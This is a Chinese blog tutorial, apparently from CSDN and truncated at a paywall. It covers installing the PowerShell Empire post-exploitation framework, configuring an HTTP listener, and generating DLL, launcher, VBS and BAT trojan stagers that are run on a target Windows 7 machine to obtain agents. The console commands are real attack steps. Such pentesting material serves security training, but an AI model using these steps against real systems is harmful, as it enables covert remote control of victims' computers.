Powershell攻击指南2——Empire

最新推荐文章于 2024-03-21 09:58:52 发布
最新推荐文章于 2024-03-21 09:58:52 发布
阅读量984 收藏 9
点赞数
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/110686135
版权

目录

Empire

1.介绍

2.安装

3.使用监听

4.生成木马

4.1 DLL木马

4.2 launcher

4.3 launcher_vbs木马

4.4 launcher_bat木马

4.5 Macro木马

4.6Ducky

连接主机及基本使用

1.查看已经连接的主机

2.interact命令连接主机

3.信息收集

4.权限提升

5.横向渗透

6.后门

Empire反弹回Metasploit

Empire

1.介绍

Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一-系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,
其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似于Metasploit,是一个基于PowerShell的远程控制木马。

2.安装

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire --rest -n

kali:
sudo apt install powershell-empire

3.使用监听


help

 

3.1输入Listeners进入监听线程界面

listeners
uselistener http
info

3.2配置监听

(Empire: listeners/http) > set Name shuteer
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute

 

4.生成木马

usestager TAB键查看木马模块
multi通用模块,osx是Mac系统模块

 

4.1 DLL木马

usestager windows/dll
info
set Listener shuteer
execute

4.2 launcher

launcher powershell shuteer

 

4.2.2复制powershell命令在目标机器win7执行

 

4.2.3使用agents模块查看上线机器

agents
rename EWGT63DU us    #更改主机名

 

4.3 launcher_vbs木马

usestager windows/launcher_vbs
set Listener shutteer
info
execute

使用msf上传vbs木马到目标机器并执行

 

agents查看上线目标

 

4.4 launcher_bat木马

usestager windows/launcher_bat
info

(Empire: stager/windows/launcher_bat) > set Listener shuteer
(Empire: stager/windows/launcher_bat) > execute

 

上传木马文件并执行

 

查看连接

最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
探秘Empire:一个灵活的Powershell渗透测试框架
gitblog_00007的博客
04-09 298
探秘Empire:一个灵活的Powershell渗透测试框架 项目地址:https://gitcode.com/PowerShellEmpire/Empire Empire 是一款强大的开源Powershell渗透测试工具,旨在为红队操作和安全研究提供一个功能全面、模块化的平台。在本文中,我们将深入探讨Empire的原理、应用及其独特之处,帮助你更好地理解和利用这一工具。 项目简介 Empire是...
PowerShell-Empire安装及使用
qq_61074438的博客
05-15 625
Empire简介 Empire是一款针对windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提取到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录,Mimkatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似Metasploit,是一个基于PowerShell的远程控制木马。 全部功能可参考官网
Empire – PowerShell 后渗透攻击框架
banacyo14206的博客
09-12 650
0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合;...
Empire(一)基础使用
qq_56426046的博客
09-12 1176
后渗透框架 这个框架渗透内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持域内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等。
利用powershell脚本进行内网渗透
h1825819493的博客
06-09 291
ps1是powershell脚本的拓展名,就相当于cmd的.bat脚本,但是他更加强大。
Windows PowerShell实战指南 第2版
09-02
Windows PowerShell实战指南 第2版,完整中文版,包含书签
WindowsPowerShell实战指南 高清带书签第2版.zip
06-01
《Windows PowerShell实战指南》第二版是一本专注于提升用户在Windows操作系统环境下使用PowerShell进行系统管理和自动化操作的权威书籍。PowerShell是微软推出的一种命令行脚本环境,它结合了命令行接口和脚本语言...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
powershell 攻击中的应用.pdf
12-10
powershell 攻击中的应用.pdf
powershell实战指南
10-08
在"PowerShell实战指南"中,你将深入学习如何利用这一强大的工具提升你的IT工作效率。 首先,PowerShell的核心概念是Cmdlet(Command-Let),它们是一些小型、专门的命令,用于执行特定的任务,如管理文件系统、...
渗透中的Powershell简单使用
03-28
powershell的简单使用。 一些脚本的开发 ,主要用于渗透
探索Empire:一款强大的Powershell C2框架
最新发布
gitblog_00029的博客
03-21 370
探索Empire:一款强大的Powershell C2框架 项目地址:https://gitcode.com/BC-SECURITY/Empire 在网络安全领域,有效的渗透测试工具是安全研究人员的得力助手。今天,我们要介绍的Empire是一款开源的、动态语言驱动的Post-exploitation框架,它专为Powershell设计,允许安全专家进行远程操作和控制。让我们一起深入了解一下Empi...
powershell渗透基础
qq_46804551的博客
04-30 1264
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
Empire
m0_65332604的博客
04-06 915
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
后渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
CS渗透1-安装&登录
冬萍子癸水
05-05 3102
CS脱胎于MSF,但多人协同作战等功能,又胜于msf,成为了更流行好用的渗透工具神器,甚至坐上了头把交椅。网上科普也有很多。 此篇讲第一步如何安装连接。然后开始这个系列。。。 前提是自己买服务器vps拿来连接和学习。我买的是banwagong,一年330rmb多,还行了,赶不上以前低价的年代了。 习惯了kali的debian,服务器系统也安装的是debian10。里面perl是自带的,java安装...
PowerShell渗透--Empire+Nishang(WEB安全攻防)
小英雄颂人头
03-04 1015
0xx1 empire Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Mete...
PowerShell渗透--Empire
weixin_41082546的博客
10-25 487
0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...
全!Empire的基本使用和域渗透
Appleteachers的博客
05-06 1272
一、Empire简介 ​ Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 ​ Emp

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值